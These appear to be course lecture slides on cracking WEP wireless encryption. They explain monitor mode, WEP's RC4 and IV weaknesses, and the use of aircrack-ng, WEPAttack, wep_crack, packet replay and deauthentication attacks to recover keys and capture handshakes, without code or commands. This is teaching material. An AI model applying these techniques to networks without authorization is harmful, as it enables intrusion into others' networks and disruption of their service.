This document discusses cracking WEP encryption on wireless networks. It explains that monitor mode allows a wireless card to capture all network traffic, including unencrypted data. It also describes how to use tools like aircrack-ng, wep_crack, and WEPAttack to perform dictionary attacks and brute force the 5 or 13 byte encryption keys by exploiting weaknesses in the WEP algorithm and capturing large numbers of packets with duplicate initialization vectors. With enough captured packets, these tools can typically recover WEP keys within minutes, regardless of the passphrase complexity.
3. Types:
◦ Managed mode – What is typically used
Card passes only 802.3 data
Sniffing in this mode will NOT report management frames,
control frames, or wireless-header data
Card will only pass to sniffer data on connected networks
Card automatically decrypts data
◦ Ad hoc mode – Used to form ad hoc networks
◦ Master mode – Wireless card acts as an access point
◦ Monitor mode (also called RFMON mode) – Receive-only
mode
Card in this mode will pass to sniffer ALL data from ALL
perceived networks (not just connected ones)
Data not decrypted by card
4. Encryption key is a concatenation of:
◦ A five or thirteen byte pre-shared key (could be generated from a
passphrase of other sizes)
◦ A three byte, non-secret initialization vector (IV)
Sent in packet
Varies from packet to packet
RC4 algorithm accepts encryption key and data length and
generates a pseudorandom bit stream (PRGA) the size of the data
5. PRGA is XORed with plaintext to generate
ciphertext
◦ Recall the following: If C=A⊕B and D=C⊕B, then D=A
◦ So RC4 uses symmetrical encryption
We already know the IV, all we need to figure out
is a five or thirteen byte PSK
Some WEP problems:
◦ Dictionary attacks work well, since people often use real
words as their passphrases
◦ Weaknesses in the process (the Neesus Datacom
algorithm) commonly used to transform passphrases
into PSKs make the effective key length even smaller
than the actual one (24 bits instead of 40, for example)
6. Use a packet sniffer such as Wireshark,
aerodump-ng or Kismet to capture data
◦ WNIC should be in monitor mode
◦ Need sufficient number of duplicate IVs; to get them:
Listen long enough
Generate IVs by replaying broadcasts (e.g., ARP requests)
Can guess that something is an ARP request if it is a
broadcast with a 28-byte payload (68 byte total packet
length)
Can use Aireplay-ng to retransmit
◦ With sufficient network traffic, ANY WEP password
(regardless of complexity) can be broken
7. wep_crack
◦ Can brute force any 5-byte PSK generated by the Neesus Datacom
algorithm in under ten seconds
◦ Does NOT work with 13-byte PSK
WEPAttack
◦ Works with 5-byte and 13-byte PSKs
◦ Dictionary attack
Tries Neesus Datacomm algorithm
Tries truncating or padding dictionary words to 5 and 13 bytes
Aircrack-ng
◦ Utilizes the fact that there is known plaintext inside all encrypted
packets (e.g., first two bytes of encrypted 802.2 header are always
hex AAAA)
◦ Utilizes the duplicated IVs
◦ Can crack 13-byte PSKs in about two minutes with 95% success
rate if it has 85,000 captured packets. (The more packets
captured, the higher the success rate.)
8. Basic Service Set Identifier (BSSID) – WAP’s MAC
address
Extended Service Set Identifier (ESSID) –
network’s name
Station (client) MAC address
A dictionary, possibly customized
Packet capture of initial handshake
◦ Wait for someone to connect to network
◦ Issue a deauth DoS (e.g., with aireplay-ng or airdrop-ng)
◦ To sniff the communication, use a program such as:
airodump-ng
Wireshark
kismet
Image taken from http://www.airtightnetworks.com/uploads/pics/Encryption_Decryption_WEP_01.png
The use of keys in WPA and WPA2 is complex and beyond the scope of this course. If you are interested in reading about it, a good resource is available at http://www.og150.com/assets/Wireless%20Pre-Shared%20Key%20Cracking%20WPA,%20WPA2.pdf (Just be warned that they are hawking a product.)